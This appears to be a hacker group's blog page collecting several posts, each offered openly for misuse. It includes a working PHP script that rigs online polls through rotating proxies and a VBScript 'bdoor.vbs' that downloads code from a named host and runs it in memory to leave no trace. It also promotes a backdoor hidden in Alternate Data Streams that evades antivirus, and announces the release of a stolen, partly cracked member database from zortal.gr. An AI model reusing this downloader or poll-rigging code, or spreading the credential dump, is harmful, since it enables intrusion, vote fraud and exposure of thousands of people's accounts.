This a really interesting program I accidentally found on my hard drive without knowing how it got there (?). Here is some main info about what it does:

String based analysis for registry, API calls, IRC Commands, DLL’s called and VMAware.

Display detailed headers of PE with all its section details, import and export symbols etc.

On distros, can perform an ASCII dump of the PE along with other options (check –help argument).

For windows, it can generate various section of a PE : DOS Header, DOS Stub, PE File Header, Image Optional Header, Section Table, Data Directories, Sections
ASCII dump on windows machine.

Code Analysis (disassembling)

Online malware checking (www.virustotal.com)

Check for Packer from the Database.

Tracer functionality: Can be used to identify

Anti-debugging Calls tricks, File system manipulations Calls Rootkit Hooks, Keyboard Hooks, DEP Setting Change, Network Identification traces.

Signature Creation: Allows to create signature of malware.

Batch Mode Scan to Scan all DLL and Exe in directories and sub-directories

Pretty cool huh? I checked sLicK v.04 here is what I got:

[+] Computing Checksum for malware :project1.exe

[-]Checksum of malware :439e8011d49c0d8c54e04c26e84dd95

[+] No malware detected

Wassup everybody? I haven’t posted a lot lately due to holidays but im back with sLicK v.0.4 ADS edition (ads stands for Alternative Data Streams) [Works in Win vista/7 as well]. What changed is that the backdoor is dropped as a txt file and then put as an executable in an alternative data stream. That makes sLicK even more “slick”  .

Here is the AV scan from novirusthanks:

BOOJAJAJAJJAJ

soon available on the mark3tplac3

<3

+

Why expose when we can use what we have??? Why deface?

Soon..

<?php

echo “\r\nRipping polls for fun and profit\r\n\r\n\r\n\r\n”;

$proxia = file(“proxia.txt”);

for($i=0;$i<count($proxia);$i++){
$currprox = trim($proxia[$i]);
$currprox = str_replace(“\n”, “”, $currprox);
$currprox = str_replace(“\r”, “”, $currprox);

$skatoules = curl_init();
curl_setopt($skatoules, CURLOPT_URL,
‘http://yourpolltarget.com’);
curl_setopt($skatoules,
CURLOPT_POSTFIELDS,”myRequest=store_choice&userChoice=5″);
curl_setopt($skatoules, CURLOPT_POST, 1);
curl_setopt($skatoules, CURLOPT_HTTPHEADER, array(‘Content-Type:
application/x-www-form-urlencoded’));
curl_setopt($skatoules, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($skatoules, CURLOPT_PROXY, $currprox);
curl_setopt($skatoules, CURLOPT_HTTPPROXYTUNNEL, 1);
curl_setopt($skatoules, CURLOPT_REFERER,
‘http://yourpolltarget.com’);
curl_setopt($skatoules, CURLOPT_USERAGENT, ‘Mozilla/5.0 (Windows NT
5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1′);

$page = curl_exec($skatoules);

$pos = strpos($page, “Thanks”);
if ($pos == false) {
echo $currprox. “\tFAIL\r\n”;
curl_close($skatoules);
} else {
echo $currprox. “\tSUCCESS\r\n”;
curl_close($skatoules);
}

}

echo “\r\n\r\n\r\n\r\nNetJammer:\tnetjammer05@gmail.com\r\n”;
echo “AnalyseR:\talienyser@gmail.com\r\n\r\n\r\n”;

?>

Hello people,

this is a Proof Of Concept Code in VBScript, that will allow you to execute ANYTHING, on ANY Windows box, without ANY trace of your -probably- malicious Script. I was looking for a method that would allow me to execute code in VBScript, without having the actual file dropped on the hard disk. Something like Process Injection anyway. That’s pretty impossible in VBScript, because of its structure. BUT. What if we could execute ANYTHING without the need to download our file localy? That’s possible, hell yeah it is! VBScript has a “command” called Execute(). I really can’t find a reason for this to exist but, it does. A sample of the Execute() command would be: Execute(msgbox “test”) (of course the result would be a msgbox). Yes, you’re right. With this method you have to include your code in the script, but what if you store it REMOTELY, then READ it without saving it ANYWHERE in the filesystem, and just execute the remote script instantly? Let’s take a look!

Create a .vbs file and call it “bdoor.vbs”. Paste the following lines of code in it…

getURL “hf”, “fh”, “http://2p0wn.pointlimit.com/bd.txt”
Sub getURL(hf,fh,url)
Set objHTTP = CreateObject(“MSXML2.XMLHTTP”)
Call objHTTP.Open(“GET”, url, False,hf,fh)
objHTTP.Send
Execute(objHTTP.ResponseText)
End Sub

Create a .txt file and code your actual malware. Name it “bd.txt” for example. Now, upload your bd.txt to your host and make sure it’s a direct link, and double click bdoor.vbs. Boom…! BD.TXT’s code is executed on your LOCAL computer, without leaving a single fucking trace of its existance!

Enjoy your 7-line ownage-script,

coded by AnalyseR & Prince_Pwn3r

THIS GOES TO ALL THE PEOPLE THAT HAVE AUTOMATICALLY DECLARED

THEMSELVES ANONYMOUS ETC. NOT THE REAL ANONYMOUS

WE GET IT, YOU ARE ALL GREAT ACTIVISTS HACKERS WITH SOME SHIT ASS MESSAGE TO CONVEY, WE GET IT YOU ARE A LEGION, WE GET IT YOU DON’T FORGET, BUT GIVE IT A FUCKING BREAK, GOVERNMENT SITES/SERVERS WERE/ARE/WILL BE HIT WITH OR WITHOUT SOME FUCKIN SIGN AND SOME SHIT ASS IDEOLOGY, NICE YOU MANAGED TO SCARE THAT LITTLE BOY THAT WAS WATCHING PORN ON HIS BROTHERS COMPUTER AND ACCIDENTALLY SAW YOUR PAGE ON FACEBOOK (YEH NICE ONE).. INDIVIDUALS HAVE ACCESSED/HACKED/HUMILIATED HUGE ORGANISATIONS/BANKS/ETC BEFORE THIS WHOLE ACTIVISM  CRAP AND WILL CONTINUE TO DO SO.. YOU AIN’T SCARING ANYBODY WITH YOUR MASKS. WE HAD PWND EVERYTHING THAT YOU ARE TRYING TO DEFACE FOR YOUR 10 MINUTE FAME.

AnalyseR and Prince_Pwn3r were there. You know how we get down.

13596 email accounts

922 user accounts

All at the 2p0wn repo —> here

Brap <3

Heya! Cheers from Prince_Pwn3r & AnalyseR!

We want to introduce you, our 19642 new friends!
Exactly! Zortal.gr got owned, and here is its member list!!!
We had some problems with the dump, cause their database is huge but… HERE THEY ARE BABE!

11212/19642 (about 57,1%) are already cracked by 2p0wn.
Try to crack the rest, we just got bored…

Msg to zortal.gr Admins: Sorry dudes, you own one of the oldest Greek portals, and you still don’t get what FUCKING SECURITY MEANS! Next time, just use clear-text passwords in your Database, to make it easier for us. Nerds.

Peace and love to “Anonymous” arround the Globe, we’re with ya boys!

LOG FORMAT: Username:HASH:Password:eMail

Click Here To Get It!

This website is made by a good friend of mine named JTG(JohnTheGr8), and it’s his personal page that deals with every project he is involved in. A little about the page

My name’s John and I am a 17 year-old student from Athens, Greece. I started programming some years ago as a hobby, which I have retained until now. I mainly program in C#, and SharpMindProjects.com is the website where I publish the projects I am working on. These projects are mainly software, which are always open-source, but I might submit any other kind of work as well.

Check out the application FTPBox, which pwnz ass.. My love and respect to JTG <3